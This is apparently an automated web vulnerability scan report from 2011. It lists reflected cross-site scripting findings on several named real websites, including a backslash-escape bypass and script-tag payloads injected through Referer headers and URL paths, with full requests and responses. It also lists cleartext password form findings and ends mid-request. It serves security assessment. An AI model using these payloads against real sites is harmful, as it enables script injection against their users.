The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97003\'%3balert(1)//07f4a4f8878 was submitted in the Referer HTTP header. This input was echoed as 97003\\';alert(1)//07f4a4f8878 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /quizzes/fun-jobs/ HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97003\'%3balert(1)//07f4a4f8878

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24510
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=22abfa553b4241778de9f1b59705f453-348096330-w1-6; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X14B3012F216803CA5D312E3365B1585213EC8D31C20C34C9AF39D0109B83EB8BD8C96F6706E256F2233F133C4BEFEA9D3; domain=.cbsalary.com; expires=Thu, 12-Jan-2012 02:25:29 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR1
Date: Wed, 12 Jan 2011 02:25:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Salary
...[SNIP]...

s_cb.prop1='Advice_Quiz';
s_cb.eVar8='CBSalary - Advice_Quiz';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 97003\\';alert(1)//07f4a4f8878';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.93. http://www.cbsalary.com/quizzes/fun-jobs/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsalary.com
Path:   /quizzes/fun-jobs/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d708\'%3balert(1)//0badebf86d5 was submitted in the Referer HTTP header. This input was echoed as 4d708\\';alert(1)//0badebf86d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /quizzes/fun-jobs/?lr=cbmsn&siteid=cbmsnjmBOB HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4d708\'%3balert(1)//0badebf86d5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24510
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=de628cabcec74d2fbfe35856a11d763d-348096366-we-6; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X14B3012F216803CA5421E8580741563B5A737FE88400E53716A7CFB6A7310F285E9ECB9251BFB65E998479A5597124CC3; domain=.cbsalary.com; expires=Thu, 12-Jan-2012 02:26:06 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR15
Date: Wed, 12 Jan 2011 02:26:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Salary
...[SNIP]...

s_cb.prop1='Advice_Quiz';
s_cb.eVar8='CBSalary - Advice_Quiz';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 4d708\\';alert(1)//0badebf86d5';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.94. http://www.quantcast.com/p-10v8JLtUuOYqQ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-10v8JLtUuOYqQ

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a44e7"><script>alert(1)</script>388efaa3424 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-10v8JLtUuOYqQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a44e7"><script>alert(1)</script>388efaa3424

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Wed, 12 Jan 2011 04:09:08 GMT
Expires: Mon, 10 Jan 2011 16:09:09 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|96|1294805349403|0|NOTSET; Expires=Fri, 04-Jan-2041 04:09:09 GMT; Path=/
Set-Cookie: JSESSIONID=F5E5258ECC4563DEFE81EE5FCA822764; Path=/
Set-Cookie: qcPageID="10.122.9.114,8000,69,Wed, 12 Jan 2011 04:09:09 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=a44e7"><script>alert(1)</script>388efaa3424+-quantcast" rel="nofollow">
...[SNIP]...

2.95. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tnooz.com
Path:   /2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ffb7"><script>alert(1)</script>df6e28a765a was submitted in the REST URL parameter 4. This input was echoed as 2ffb7\"><script>alert(1)</script>df6e28a765a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /2010/11/18/news2ffb7"><script>alert(1)</script>df6e28a765a/untangling-the-complexities-of-search-marketing-in-travel/ HTTP/1.1
Host: www.tnooz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 12 Jan 2011 04:09:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.tnooz.com/xmlrpc.php
Location: http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="post" action="/2010/11/18/news2ffb7\"><script>alert(1)</script>df6e28a765a/untangling-the-complexities-of-search-marketing-in-travel/#mc_signup_form" id="mc_signup_form">
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 37 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://digg.com/search  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23348 10.2.129.156
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7669


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

3.2. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:31:10 GMT; path=/; domain=digg.com
Set-Cookie: d=3b5b9a2fff23b5034f72836f0c1564901f30b745ea1e1762c0d50e4b67aefbde; expires=Mon, 11-Jan-2021 13:38:50 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24431 10.2.129.145
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

3.3. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
<br />
<form id="test" action="dummy.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" value="" /></td>
...[SNIP]...

3.4. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

3.5. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</pre>
<form id="myForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" /></td>
...[SNIP]...

3.6. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</pre>
<form id="myForm2" action="dummy2.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" /></td>
...[SNIP]...

3.7. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm3" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

3.8. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

3.9. http://www.nutrisystem.com/jsps_hmr/about/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/about/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/about/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/about/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.10. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/careers/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/careers/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/careers/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.11. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/basic.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/men/basic.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/basic.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/diabetes.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/men/diabetes.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
